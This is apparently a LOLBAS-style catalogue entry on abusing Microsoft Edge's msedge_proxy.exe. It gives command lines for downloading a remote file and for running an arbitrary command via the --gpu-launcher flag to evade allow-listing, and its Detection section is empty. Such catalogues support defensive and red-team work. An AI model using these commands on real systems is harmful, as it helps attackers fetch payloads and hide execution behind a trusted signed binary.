msedge_proxy.exe

Microsoft Edge Browser

Paths

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

Commands

Download

msedge_proxy will download malicious file.

Use case: Download file from the internet

Privileges: User

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe {REMOTEURL:.zip}

Execute

msedge_proxy.exe will execute file in the background

Use case: Executes a process under a trusted Microsoft signed binary

Privileges: User

C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"

Detection